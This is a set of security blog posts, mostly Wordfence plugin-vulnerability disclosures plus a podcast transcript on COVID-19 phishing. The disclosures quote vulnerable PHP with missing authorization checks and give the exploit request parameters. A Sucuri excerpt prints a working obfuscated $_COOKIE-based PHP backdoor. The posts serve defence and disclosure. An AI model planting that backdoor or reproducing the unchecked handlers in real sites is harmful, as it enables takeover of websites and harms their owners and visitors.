Episode 71: Hackers Targeting COVID-19 Fears

With many of us under either lockdown or shelter-in-place orders due to the COVID-19/Corona virus, fear and stress are rampant. This additional stress lowers our critical thinking capabilities and increases our vulnerability. Hackers targeting these human vulnerabilities are using the global pandemic to attempt exploitation through numerous scams and phishing campaigns. We also cover plugin vulnerabilities affecting tens of thousands of sites as well as a new product from Wordfence, Fast or Slow, a global website speed profiler.

Here are timestamps and links in case you’d like to jump around, and a transcript is below.
2:05 Coronavirus scams found and explained
4:48 HHS.gov open redirect used by coronavirus phishing to spread malware
8:00 Vulnerabilities patched in the Data Tables Generator by Supsystic Plugin
9:52 Vulnerability in WPvivid Backup Plugin can lead To database leak
10:29 Wordfence launches Fast or Slow, a website profiling tool measuring site performance from major global locations

Find us on your favorite app or platform including iTunes, Google Podcasts, Spotify, YouTube, SoundCloud and Overcast.

Click here to download an MP3 version of this podcast. Subscribe to our RSS feed.

Have a story you’d like us to cover or someone you’d like to interview? Let us know! Contact us at press AT wordfence.com!

Episode 71 Transcript

Hi, and welcome to episode 71 of Think Like a Hacker. This is the podcast about WordPress, security, and innovation.

It is the end of March 2020, and we’re going through a lot worldwide. We’re not going to have an interview this week with so much going on. We are under shelter-in -place or lockdowns around the world as public health officials strive to keep as many people safe from coronavirus infection as possible. With death tolls rising around the world, it feels like we’re in a new era of humanity.

Obviously, we’re all under some elevated stress, and that elevated stress and the requisite fear is making us susceptible to making poor decisions. As I talked about last week, scientists say that when we are under no stress whatsoever, we can handle about seven, plus or minus two, bits of information at any given time, that means what we can can perceive, and when we’re under stress or when we’re in a fear state, which is basically a stress state, that makes us even more susceptible to perceiving less. It makes us vulnerable.

I woke up this morning to a news story that a man here in the Phoenix area had died from taking an aquarium cleaning substance that he thought would protect him from coronavirus. When we’re in fear, we’re not thinking our best. It’s really time for us now to slow down, to put a buffer zone between the stimulus of this stressful environment that we are all now in, and our response to that environment. It’s important now for us to really get good data and make good decisions.

With that, our first story today is from MalwareBytes, and they went through some of the coronavirus scams that have been coming online. In their blog post, they noted that a Twitter user had published a web tracker finding that 3,600 host names came online in just 24 hours that were related to coronavirus or COVID-19, and Risk IQ reported that they had tracked more than 13,000 suspicious coronavirus related domains over the course of a weekend, and on the very next day, more than 35,000 domains. All of these links are going to be in the show notes.

What does this tell us? It tells us that hackers are detecting vulnerability. They’re not detecting necessarily vulnerability in our systems, but they know that there’s vulnerability where there is fear, and they are targeting the weakest link. Most of these are phishing campaigns. They also detail a story that we’ve covered in the podcast a couple of episodes ago about an email phishing campaign sent by threat actors that were impersonating the World Health Organization with the intent of stealing credentials, usernames and passwords. They detail some incidents where threat actors are attempting to install malicious payloads on systems.

Now obviously, this shows that there’s going to be a growing threat, and this threat is not targeting our computers, it’s targeting us, and it’s targeting us because we are in vulnerable states, and what do we do when we’re in vulnerable states? The best thing you can do is to take care of yourself, not only your physical health and obviously boosting your immune system, getting decent sleep, getting decent exercise, but taking care of your mental health. Your mental health ends up being that which alleviates the vulnerability of fear and stress. It alleviates the vulnerability that hackers are attempting to target right now. Whether it is meditation, deep breathing, yoga, whatever you need to do in order to take care of yourself and your mental health is going to sort of be that firewall for your life, not just your mind, not just your email, but it’s going to help you make better decisions for you, for your family, everyone around you.

Our second article is an open redirect that’s being used. It is on the Health and Human Services (HHS.gov), domain and this is being used by malicious attackers to spread coronavirus phishing malware. So basically, emails are being sent out through this open redirect on one of their web addresses, and open redirect basically automatically redirects users between a source website and a target site, and malicious actors use these to target phishing landing pages or deliver malware payloads, because they can do so under the guise of a legitimate service, and with everybody attuned to wanting to get the latest information about coronavirus, having an open redirect on the hhs.gov Health and Human Services website, that is definitely something dangerous. So the open redirect is in the article on BleepingComputer using it to send out a malicious attachment containing a coronavirus.doc.lnk file that unpacks obfuscated VBScript that executes a raccoon information stealer malware payload that’s coming from an IP address also detailed in that blog post.

Now, one of the things that coronavirus is really exposing, to me, is how as a society, we are not equipped well, in many ways, to care for our elders. Obviously, this virus is targeting the most vulnerable, those of our parents and grandparents, and it’s much like what’s happening with phishing and other scams like this. Obviously, we all get phishing emails, but those who are most vulnerable to these are the most trusting, and those of our parents and our grandparents, who often find themselves victims of these types of scams, whether it’s coming through an email or it’s on a phone call or an SMS message.

I would like to posit that it is our responsibility as security professionals, and even if you don’t think of yourself as a security professional, the fact that you’re listening to this podcast means that you are aware of security, and we have a responsibility to take care of the most vulnerable in our communities, whether that be the WordPress community or our communities at home. So talk to your parents, obviously, with social distancing at this time, but talk to them about these types of threats. Make sure that they are aware. Use antivirus on their computers if you can, and support them and educate them. Obviously, our first line of defense is going to be educating anyone who’s using the internet to realize that these types of threats exist.

On to some stories in the WordPress world, we have a couple of plugin vulnerabilities to cover. First of all, Chloe Chamberland, one of our Threat Analysts here at Wordfence, found vulnerabilities in the Data Tables Generator by Supsystic [plugin]. She did find some vulnerabilities in the pricing table by Supsystic plugin and worked with them and both of these plugins. Now, the Data Tables Generator plugin is a WordPress plugin installed on over 30,000 sites. These flaws were quite similar, allowed attackers to execute AJAX actions that could inject malicious JavaScript and forge requests on behalf of authenticated site users.

Wordfence premium users received firewall rules against this vulnerability’s exploit on January 21, 2020, and free received that rule on February 20th, so even though we hadn’t disclosed this because it was still being patched, you’ve been protected, if you’re using Wordfence, for quite some time. With all of the crazy stuff that’s happening in the world right now, the last thing you want to think about is updating plugins immediately, or even writing blog posts. There’s a lot of other things that are demanding our attention. So these are the times when it’s really good to have a firewall, because firewalls buy you time. Even though a vulnerability might exist in the world, you don’t even have to be aware of it. Your firewall is blocking malicious attacks, and as we’re seeing, hackers and malicious actors are much more active in times of great fear and vulnerability. So now’s the best time to make sure that everything is protected, including your WordPress site.

Our next story is a vulnerability that was patched in the WPvivid Backup plugin. This could lead to a database leak. This plugin was installed on over 30,000 sites as of a few weeks ago, and the issue has been fixed in version 0.9.36. It was another AJAX action that didn’t have an authorization check, so make sure that if you’re using that plugin that you have that patched.

Our final story. I saved the best for last, because there’s no fear associated with this. It’s not even a vulnerability. Wordfence is really happy to announce that we have a new product. This product, all free. It’s called Fast or Slow. You can find it fastorslow.com. This tool helps you measure your WordPress — or other — sites performance from various locations around the world. Now, if you’re interested in site performance, you’ve probably used various tools in order to measure whether an at your site was performing well for your users.

This tool is unique in that it looks at performance globally. So if you have a product or a service that is relevant to anyone in the world, say for example, software that you are selling online, and you would like to ensure that users in Australia, even though you’re based in, let’s say Kansas, that your users in Australia are having a good experience with your website. You can use Fast or Slow to see how Australians are experiencing your site, to see how South Americans are experiencing your site, how Europeans are. It’s a really neat tool. It’s free. You can put in your website, see how it’s performing, and we really recommend signing up for monitoring.

What this will do is run reports over time. So if your hosting provider, for example, is having an issue or you’re seeing degraded performance over time, Fast or Slow will let you know when a problem like that exists. It’s horrible to have those types of experiences sneak up on you, and you realize that your server is overloaded and not performing well, especially for a location where you have no visual experience. Fast or Slow will monitor this for you, let you know when your site might be having a problem, give you some relevant data that you can take to your developers, that you can take to your hosting provider, that you can take to heart and make better decisions in order to make sure that your site is serving your users.

With that, that is podcast episode 71 of Think Like a Hacker. Thanks for listening. If there is anything that Wordfence can do in order to support you during these very strange and different times, please, please reach out and let us know what we can do in order to be of service. We have been a remote team since our inception. All of us have our methodologies and procedures in place in order to be of service from where we’re at, and if things are shifting for you, please let us know how we can be of service, we’re here for you, and I just want to underscore again how important it is to take time during this experience to take care of your mental health. Your mental health is your firewall for your life. It’s going to allow you to really ascertain what you need to do for yourself, what you need to do for your family, what you need to do for your business in order to not only survive these troubled times, but to succeed within them.

If there’s anything I personally can do, reach out to me, Kathy [AT] wordfence.com. If there is someone that you would like me to bring on the podcast, let me know. And with that, we will wrap it up. Next week, we will have another episode, and hopefully even more good news to report.

Thanks for listening!

The post Episode 71: Hackers Targeting COVID-19 Fears appeared first on Wordfence.

Vulnerabilities Patched in IMPress for IDX Broker

On February 28, 2020, the Wordfence Threat Intelligence team became aware of a newly patched stored Cross-Site Scripting (XSS) vulnerability in IMPress for IDX Broker, a WordPress plugin with over 10,000 installations. Although all Wordfence users, including those still using the free version of Wordfence, were already protected from this vulnerability by the Web Application Firewall’s built-in XSS protection, we investigated the plugin further and discovered an additional stored XSS vulnerability. We also found a flaw that would allow an authenticated attacker with minimal, subscriber-level permissions to permanently delete any page or post on the site, in addition to creating pages with arbitrary titles.

We initially reached out to the plugin’s vendor the same day, on February 28, 2020, but received no response over an extended period of time. On March 19, 2020, after notifying the WordPress plugin team, we received a response from the plugin’s developer, at which time we sent the full disclosure details. A fully patched version was released on March 23, 2020, and we recommend updating to the latest version, 2.6.2, immediately.

Wordfence Premium users received a new firewall rule on March 2nd to protect against exploits targeting these vulnerabilities. Free Wordfence users will receive this rule on April 1, 2020.


Description: Authenticated Stored Cross-Site Scripting(XSS)
Affected Plugin: IMPress for IDX Broker
Plugin Slug: idx-broker-platinum
Affected Versions: <= 2.6.1
CVE ID: Pending
CVSS Score: 7.4 (high)
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L
Fully Patched Version: 2.6.2

The IMPress for IDX Broker plugin contains a captcha feature to prevent spam submissions. Since it uses Google’s ReCAPTCHA service, it requires an API key. Unfortunately, the AJAX action the plugin registered to update this API key did not use capability checks or nonce checks.

This made it  possible for a logged-in attacker with minimal permissions, such as a subscriber, to send a request to wp-admin/admin-ajax.php with the action parameter set to idx_update_recaptcha_key and the idx_recaptcha_site_key parameter set to a malicious JavaScript, which could then be executed in an administrator’s browser the next time they visited the plugin’s settings panel.

As with most attacks taking advantage of stored XSS in admin areas, this could be used to make use of the administrator’s session in order to create a new, malicious administrative user.

The AJAX action:

add_action( 'wp_ajax_idx_update_recaptcha_key', array( $this, 'idx_update_recaptcha_key' ) );

The vulnerable function:

	public function idx_update_recaptcha_key() {
		if ( $_POST['idx_recaptcha_site_key'] ) {
			update_option( 'idx_recaptcha_site_key', $_POST['idx_recaptcha_site_key'], false );
			echo 1;
		} else {
			delete_option( 'idx_recaptcha_site_key' );
			echo 'error';
		}
		die();
	}

Description: Authenticated Post Creation, Modification, and Deletion
Affected Plugin: IMPress for IDX Broker
Plugin Slug: idx-broker-platinum
Affected Versions: <= 2.6.1
CVE ID: CVE-2020-9514
CVSS score: 8.1(high)
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H
Fully Patched Version: 2.6.2

One of the features included with the IDX Broker plugin is the ability to create and delete “dynamic pages,” intended to ensure that any IDX pages match the site’s style and branding.

The plugin registers 2 AJAX actions that are used to do this:

add_action( 'wp_ajax_create_dynamic_page', array( $this, 'idx_ajax_create_dynamic_page' ) );
add_action( 'wp_ajax_delete_dynamic_page', array( $this, 'idx_ajax_delete_dynamic_page' ) );

Once again, neither of the functions called by these AJAX actions used capability checks or nonce checks. As such it was possible for an authenticated attacker with minimal, subscriber-level, permissions to send a request to wp-admin/admin-ajax.php with the action parameter set to create_dynamic_page and the post_title parameter set to any arbitrary value. In return, a new dynamic page with that title would be created.

If a wrapper_page_id parameter was included and set to the ID of an existing post or page, that post or page would be replaced with a blank wrapper page:

	public function idx_ajax_create_dynamic_page() {

		// default page content
		$post_content = $this->does_theme_include_idx_tag();

		$post_title = $_POST['post_title'] ? $_POST['post_title'] : 'Properties';
		$new_post   = array(
			'post_title'   => $post_title,
			'post_name'    => $post_title,
			'post_content' => $post_content,
			'post_type'    => 'idx-wrapper',
			'post_status'  => 'publish',
		);
		if ( $_POST['wrapper_page_id'] ) {
			$new_post['ID'] = $_POST['wrapper_page_id'];
		}
		$wrapper_page_id = wp_insert_post( $new_post );
		update_option( 'idx_broker_dynamic_wrapper_page_name', $post_title, false );
		update_option( 'idx_broker_dynamic_wrapper_page_id', $wrapper_page_id, false );
		$wrapper_page_url = get_permalink( $wrapper_page_id );
		$this->idx_api->set_wrapper( 'global', $wrapper_page_url );
		update_post_meta( $wrapper_page_id, 'idx-wrapper-page', 'global' );

		die(
			json_encode(
				array(
					'wrapper_page_id'   => $wrapper_page_id,
					'wrapper_page_name' => $post_title,
				)
			)
		);
	}

Alternatively, if the attacker set the action parameter to delete_dynamic_page and sent a wrapper_page_id parameter with the ID of an existing post or page, then that post or page would be permanently deleted:

	public function idx_ajax_delete_dynamic_page() {
		if ( $_POST['wrapper_page_id'] ) {
			wp_delete_post( $_POST['wrapper_page_id'], true );
			wp_trash_post( $_POST['wrapper_page_id'] );
		}
		die();
	}

Disclosure Timeline

February 28, 2020 – Our Threat Intelligence team discovers and analyzes vulnerabilities in the IMPress for IDX Broker plugin while reviewing a recently patched vulnerability. We attempt to make contact with the plugin vendor.
March 2, 2020 – Firewall rule released for Wordfence Premium users.
March 19, 2020 – After followup with WordPress.org plugin team, plugin vendor confirms appropriate mailbox, and we provide them with full disclosure.
March 23, 2020 – Fully patched version becomes available.
April 1, 2020 – Firewall rule becomes available to Wordfence free users.

Conclusion

In today’s post, we detailed several vulnerabilities including stored XSS and Post creation, modification, and deletion found in the IMPress for IDX Broker plugin. These flaws have been patched in version 2.6.2, and we recommend that users update to the latest version available immediately. Sites running Wordfence Premium have been protected from attacks against this vulnerability since March 2, 2020. Sites running the free version of Wordfence received the firewall rule update on April 1, 2020.

The post Vulnerabilities Patched in IMPress for IDX Broker appeared first on Wordfence.

Severe Flaws Patched in Responsive Ready Sites Importer Plugin

On March 2nd, our Threat Intelligence team discovered several vulnerable endpoints in Responsive Ready Sites Importer, a WordPress plugin installed on over 40,000 sites. These flaws allowed any authenticated user, regardless of privilege level, the ability to execute various AJAX actions that could reset site data, inject malicious JavaScript in pages, modify theme customizer data, import .xml and .json files, and activate plugins, among many other actions.

We reached out to the plugin’s developer on March 3, 2020, and they were proactive and quick to respond. They released patches consisting of nonce and permissions checks on nearly all of the AJAX endpoints before we sent over the full vulnerability details the following morning. We still provided the full disclosure, and pointed out a few AJAX endpoints missed in their initial release. They released a final patch just a few days later.

This is considered a severe security issue that could lead to attackers completely taking over WordPress sites. We highly recommend updating to the latest version available, 2.2.7, immediately.

Wordfence Premium customers received a new firewall rule on March 2, 2020, to protect against exploits targeting this vulnerability. Free Wordfence users will receive the rule after thirty days, on April 1, 2020.

Description: Unprotected AJAX Actions
Affected Plugin: Responsive Ready Sites Importer
Plugin Slug: responsive-add-ons
Affected Versions: <= 2.2.5
CVE ID: Will be updated once identifier is supplied.
CVSS Score: 9.1 (Critical)
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:H/A:L
Fully Patched Version: 2.2.6

Gutenberg & Elementor Templates Importer For Responsive, also called Responsive Ready Sites Importer, is a plugin designed to import templates and site content to be used with the Gutenberg or Elementor page builders. The plugin is very simple to use and provides a plethora of templates for site owners to choose from.

The import functionality relies on various AJAX actions, with functionalities ranging from resetting site data prior to an import all the way to importing .xml and .json files to provide data for the import. We discovered 23 vulnerable endpoints, and the majority of these were found in the /class-responsive-ready-sites-importer.php file.

/**
 * Constructor.
 *
 * @since 1.0.0
 */
public function __construct() {

   add_action( 'init', array( $this, 'load_importer' ) );

   $responsive_ready_sites_importers_dir = plugin_dir_path( __FILE__ );
   require_once $responsive_ready_sites_importers_dir . 'class-responsive-ready-sites-importer-log.php';
   include_once $responsive_ready_sites_importers_dir . 'class-responsive-ready-sites-widgets-importer.php';
   include_once $responsive_ready_sites_importers_dir . 'class-responsive-ready-sites-options-importer.php';

   // Import AJAX.
   add_action( 'wp_ajax_responsive-ready-sites-import-set-site-data-free', array( $this, 'import_start' ) );
   add_action( 'wp_ajax_responsive-ready-sites-import-xml', array( $this, 'import_xml_data' ) );
   add_action( 'wp_ajax_responsive-ready-sites-import-wpforms', array( $this, 'import_wpforms' ) );
   add_action( 'wp_ajax_responsive-ready-sites-import-customizer-settings', array( $this, 'import_customizer_settings' ) );
   add_action( 'wp_ajax_responsive-ready-sites-import-widgets', array( $this, 'import_widgets' ) );
   add_action( 'wp_ajax_responsive-ready-sites-import-options', array( $this, 'import_options' ) );
   add_action( 'wp_ajax_responsive-ready-sites-import-end', array( $this, 'import_end' ) );

   add_action( 'responsive_ready_sites_import_complete', array( $this, 'clear_cache' ) );

   include_once $responsive_ready_sites_importers_dir . 'batch-processing/class-responsive-ready-sites-batch-processing.php';

   // Reset Customizer Data.
   add_action( 'wp_ajax_responsive-ready-sites-reset-customizer-data', array( $this, 'reset_customizer_data' ) );
   add_action( 'wp_ajax_responsive-ready-sites-reset-site-options', array( $this, 'reset_site_options' ) );
   add_action( 'wp_ajax_responsive-ready-sites-reset-widgets-data', array( $this, 'reset_widgets_data' ) );

   // Reset Post & Terms.
   add_action( 'wp_ajax_responsive-ready-sites-delete-posts', array( $this, 'delete_imported_posts' ) );
   add_action( 'wp_ajax_responsive-ready-sites-delete-wp-forms', array( $this, 'delete_imported_wp_forms' ) );
   add_action( 'wp_ajax_responsive-ready-sites-delete-terms', array( $this, 'delete_imported_terms' ) );

   if ( version_compare( get_bloginfo( 'version' ), '5.0.0', '>=' ) ) {
      add_filter( 'http_request_timeout', array( $this, 'set_timeout_for_images' ), 10, 2 );
   }
}

Using the import_start function tied to the wp_ajax_responsive-ready-sites-import-set-site-data-free action as an example below. It can be shown that there was a lack of capability checks and nonce checks as part of the functions. This was evident in all of the identified functions triggered by the registered AJAX actions that we found vulnerable.

/**
 * Start Site Import
 *
 * @since  1.0.0
 * @return void
 */
public function import_start() {

          $demo_api_uri = isset( $_POST['api_url'] ) ? esc_url( $_POST['api_url'] ) : ''; //phpcs:ignore

   if ( ! empty( $demo_api_uri ) ) {

      $demo_data = self::get_responsive_single_demo( $demo_api_uri );
      if ( ! $demo_data['success'] ) {
         wp_send_json( $demo_data );
      }

      update_option( 'responsive_ready_sites_import_data', $demo_data );

      if ( is_wp_error( $demo_data ) ) {
         wp_send_json_error( $demo_data->get_error_message() );
      } else {
         do_action( 'responsive_ready_sites_import_start', $demo_data, $demo_api_uri );
      }

      wp_send_json_success( $demo_data );

   } else {
      wp_send_json_error( __( 'Request site API URL is empty. Try again!', 'responsive-addons' ) );
   }

}

All of the vulnerable actions could be called with a simple request to /wp-admin/admin-ajax.php?action=[Vulnerable-Action] along with the appropriate parameters set, by any authenticated user, including users with minimal subscriber-level permissions.

Fortunately, in the latest version of this plugin, capability checks to help control access and execution, as well as CSRF protection using WordPress nonces, were implemented on all of these endpoints.

A Deeper Dive on a Few Endpoints

Although there were several unprotected endpoints, a few were a little more worrisome than others.

The AJAX action wp_ajax_responsive-ready-sites-import-xml triggers a function that imports an XML file to be used to supply data as part of the import process. Then, the AJAX action wp_ajax_responsive-wxr-import would trigger the function that imports all the data from the previously imported XML file. Using these two actions together could allow an attacker to import an XML file containing malicious payloads such as new pages on the site. The malicious payloads would then be executed anytime a user browsed to the newly imported page. This could result in malicious site redirects and rogue administrative user creation, among other consequences.

The AJAX actions wp_ajax_responsive-ready-sites-import-options, wp_ajax_responsive-ready-sites-import-widgets, and wp_ajax_responsive-ready-sites-import-customizer-settings triggered functions that would import widgets, site options, and site customizer data. These could be used by an attacker to overwrite site data with malicious data of their choice.

A Brief Note To Site Owners and WordPress Developers

Site owners. Vulnerable AJAX endpoints are, unfortunately, a very common vulnerability among WordPress plugins and themes. We highly recommend disabling user registration on your site if it is not necessary for the site’s functionality. If your site is running a plugin or theme with a vulnerable AJAX endpoint, this will prohibit any attackers from being able to register an account, login, and then execute attacks against these vulnerable endpoints that could potentially compromise your site.

It is also highly recommended to ensure your plugins and themes are up to date at all times as these vulnerabilities are often immediately discovered and patched. In the cases where a patch isn’t released quickly, it is important you have a Web Application Firewall in place, such as the one provided by Wordfence, to help provide protection during the interim period where a vulnerability might be discovered and actively attacked before it has been completely patched.

Developers. It is incredibly important to add capability checks and CSRF protection on functions controlled by AJAX actions in plugins and themes. Subscriber-level users and above have the ability to execute these actions if the proper security measures are not in place. Many WordPress sites allow open registration, creating a large attack surface for these vulnerabilities that are typically very easy to exploit.

Use functions like current_user_can() to check for user capability on actions along with wp_create_nonce() and wp_verify_nonce() to verify the legitimacy of a request’s source to protect against CSRF on all AJAX functions.

To see how common these vulnerabilities are, you can review some of our recently discovered unprotected AJAX actions vulnerabilities in Popup Builder, Import Export WordPress Users, 301 Redirects – Easy Redirect Manager, and RegistrationMagic. As a plugin developer, it is important to take preventive steps against creating these vulnerabilities, just as it is important to protect yourself against these as a site owner.

Disclosure Timeline

March 2, 2020 – Initial discovery and analysis of vulnerability. We release a firewall rule for Wordfence Premium customers.
March 3, 2020 – We make our initial contact attempt with the plugin development team. Developer responds and confirms that we have reached them through the appropriate inbox.
March 4, 2020 – We send over the full disclosure details. Developer responds and indicates all vulnerabilities have been fixed.
March 4-5, 2020 – We further analyze the fixes and discover a few AJAX actions left unprotected. We notify the developer.
March 11, 2020 – Developer releases final sufficient patch.
April 1, 2020 – Free Wordfence users receive firewall rule.

Conclusion

In today’s post, we detailed several flaws related to unprotected AJAX actions in the Responsive Ready Sites Importer plugin. These flaws have been fully patched in version 2.2.6. We recommend that users update to the latest version available immediately. Sites running Wordfence Premium have been protected from attacks against this vulnerability since March 2, 2020. Sites running the free version of Wordfence will receive the firewall rule update on April 1, 2020.

The post Severe Flaws Patched in Responsive Ready Sites Importer Plugin appeared first on Wordfence.

Assemble the Cookies

When we investigate compromised websites, it’s not unusual to find malicious files that have been obfuscated through forms of encoding or encryption — however, these are not the only methods that attackers use to obfuscate code.

Obfuscation via Predefined PHP Variables

Here’s an example of obfuscation that doesn’t use encoding or encryption in any way:

<?php
$x=’_C’;$v=’OO’;/*5h*/$o=’KI’;/*{*Z*/$qv=’E’;$j/*8i$7*/=${$x.$v.$o.$qv};if(isset($j/*f(UZ*/[‘Q’])){$oo=$j/*Mr*/[‘Q’].$j[‘J’];$tj=/*m5d*/$j[‘St’].$j[‘V’].$j[‘x’];$pd=$oo(”,$tj($j[‘U’]));$pd();}

Instead, this example splits a PHP predefined variable, $_COOKIE, into segmented strings assigned to variables before concatenating them.

Continue reading Assemble the Cookies at Sucuri Blog.

Vulnerabilities Patched in the Data Tables Generator by Supsystic Plugin

A few weeks ago, we disclosed several flaws that were patched in the Pricing Table by Supsystic plugin. On January 20th, our Threat Intelligence team discovered several similar vulnerabilities present in another product from Supsystic: Data Tables Generator by Supsystic, a WordPress plugin installed on over 30,000 sites. These flaws were very similar and allowed an attacker to execute several AJAX actions, inject malicious Javascript, and forge requests on behalf of an authenticated site user. However, in the Data Tables Generator plugin, these flaws required an attacker to be logged in as a user with subscriber or above permissions on a target site.

We privately disclosed these issues to the plugin’s author at the same time we fully disclosed the flaws discovered in Pricing Table by Supsystic; again, they released patches a little over a month later. We recommend updating to the latest version, 1.9.92, immediately.

Wordfence Premium users received a new firewall rule on January 21, 2020 to protect against exploits targeting these vulnerabilities. Free Wordfence users received this rule on February 20, 2020.


Description: Insecure Permissions on AJAX Actions
Affected Plugin: Data Tables Generator by Supsystic
Plugin Slug: data-tables-generator-by-supsystic
Affected Versions: <= 1.9.91
CVE ID: Post will be updated once assigned.
CVSS Score: 6.3 (Medium)
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
Patched Version: 1.9.92

Data Tables Generator by Supsystic is an easy to use responsive table, chart, and data management plugin. It has several features such as custom css, the ability to add iframes, different fonts and label capabilities, and more. Unfortunately, we discovered that all of the AJAX actions to provide these features lacked capability checks and WordPress nonces for CSRF (Cross-Site Request Forgery) protection.

</pre>
<pre> /**
  * Validate and creates the new table.
  * @param Rsc_Http_Request $request
  * @return Rsc_Http_Response
  */
 public function createAction(Rsc_Http_Request $request)
 {
     $title = trim($request->post->get('title'));
     $rowsCount = (int) $request->post->get('rows');
     $colsCount = (int) $request->post->get('cols');

     try {
if (!$this->isValidTitle($title)) {
             return $this->ajaxError($this->translate('Title can't be empty or more than 255 characters'));
         }
$this->getEnvironment()->getModule('tables')->setIniLimits();
// Add base settings
         $tableId = $this->getModel('tables')->add(array('title' => $title, 'settings' => serialize(array())));

if($tableId) {
   $rows = array();

   for($i = 0; $i < $rowsCount; $i++) {
      array_push($rows, array('cells' => array()));
      for($j = 0; $j < $colsCount; $j++) {
         array_push($rows[$i]['cells'], array(
            'data' => '',
            'calculatedValue' => '',
                         'hidden' => '',
                      'type' => 'text',
                      'formatType' => '',
            'meta' => array()
         ));
      }
   }
   // Save an empty table's rows to prevent error when the Data Tables script will be executed
   $this->getModel('tables')->setRows($tableId, $rows);
}
     } catch (Exception $e) {
         return $this->ajaxError($e->getMessage());
     }

     return $this->ajaxSuccess(array('url' => $this->generateUrl('tables', 'view', array('id' => $tableId))));
 }</pre>
<pre>

**One example of a function triggered by the AJAX action create. No nonce or permission checks present.

WordPress AJAX actions can be processed by any authenticated user. As such, AJAX actions should always require an additional capability check in order to verify that the user sending the request is an authenticated administrative user when the action is meant for only administrative users. Without the required permission check, any user logged in as subscriber or above could execute the actions and make malicious changes to any given data table, or create a new data table. With many sites allowing open subscriber registrations, protecting site functionality with capability checks is critical when utilizing AJAX actions.

The vulnerable endpoints we discovered were: getListForTbl, updateRows, updateMeta, saveSettings, remove, create, render, getSettings, getMeta, getCountRows, getRows, clone, and rename. The most impactful endpoints were rename, where an attacker could rename any given data table name, getListForTbl, where an attacker could discover all of the existing tables and use that information to craft a request, saveSettings, where an attacker could modify any data table settings maliciously, and create, where an attacker could create a new data table with any options set.


Description: Authenticated Stored XSS
Affected Plugin: Data Tables Generator by Supsystic
Affected Versions: <= 1.9.91
CVE ID: Post will be updated once assigned.
CVSS Score: 5.4 (Medium)
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
Patched Version: 1.9.92

As an extension of the previous vulnerability, we discovered that malicious Javascript could be injected into many data table fields, including the title, the data table cells, the description and caption, and more, by using the saveSettings endpoint to update an existing data table.

The malicious Javascript would then execute in a site visitor’s browser whenever they accessed a page containing the data table. This could ultimately lead to malicious site redirection, new administrative user account creation, and other malicious actions.

As previously mentioned with the Pricing Table by Supsystic plugin, WordPress allows default administrators the capability to use unfiltered_html. Alone, these settings would not be considered a security risk if only administrative users had access to modify these settings. However, providing the unfiltered_html capability with these AJAX actions that allowed even subscriber-level users to modify these settings introduced a cross site scripting (XSS) vulnerability.


Description: CSRF to Stored XSS, Data Table Creations, Settings Modification
Affected Plugin: Data Tables Generator by Supsystic
Plugin Slug: data-tables-generator-by-supsystic
Affected Versions: <= 1.9.91
CVE ID: Post will be updated once assigned.
CVSS Score: 8.8 (High)
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
Patched Version: 1.9.92

The lack of WordPress nonces for CSRF protection on all actions registered in this plugin also resulted in several Cross-Site Request Forgery (CSRF) vulnerabilities. Given that the registered actions could be executed by any logged-in user regardless of privilege level, CSRF exploit attempts could be targeted towards any user, even those with just a subscriber role.

If an attacker was able to trick any authenticated user into clicking on a link or opening a malicious attachment, a forged request could be sent on behalf of that user to modify any given data table and inject malicious Javascript. Again, the malicious Javascript could inject a new administrative user, redirect site visitors to a malicious site, and more.

It is important to remember not to click on links in comments or emails unless you can verify the authenticity of the source and the destination to protect against a CSRF exploit attempt. It is difficult for firewalls to protect against CSRF attacks because the malicious request appears to come from a valid, authenticated user.

Disclosure Timeline

January 20, 2020 – Vulnerability initially discovered and analyzed. We begin working on firewall rules.
January 21, 2020 – Firewall rule released for Wordfence premium users. Awaiting response from the Supsystic’s plugin team in regards to vulnerabilities in Pricing Table by Supsystic.
January 21, 2020 – Plugin team confirms appropriate inbox for handling discussion. Full disclosure of vulnerabilities is sent.
January 30, 2020 – Follow-up with plugin team as no response from disclosure.
February 11, 2020 – Plugin developer acknowledges report.
February 20, 2020 – Wordfence free users receive firewall rule.
February 21, 2020 – Additional and final follow-up. Insufficient patch released.
February 21 to March 23, 2020 – Back and forth with the plugin team to ensure an optimal solution released.
March 23, 2020 – Final patch released.

Conclusion

In today’s post, we detailed several vulnerabilities including stored XSS, CSRF, and insecure permissions found in the Data Tables by Supsystic plugin. These flaws have been fully patched in version, 1.9.92, and we recommend that users update to the latest version available immediately. Sites running Wordfence Premium have been protected from attacks against this vulnerability since January 21, 2020. Sites running the free version of Wordfence received the firewall rule update on February 20, 2020.

The post Vulnerabilities Patched in the Data Tables Generator by Supsystic Plugin appeared first on Wordfence.

Tips for New Remote Workers

With the new pandemic hovering over our heads, the main piece of advice from most countries is stay home. Working remotely is a new reality for many people around the world, and Sucuri can help you make this new endeavor easier for you. We have been an entirely remote team since the creation of the company, more than 10 years ago.

Working from home has its perks and challenges. We asked our colleagues what recommendations they had for people who are starting to work from home as well as some advice to mitigate cybersecurity risks.

Continue reading Tips for New Remote Workers at Sucuri Blog.

Pin It on Pinterest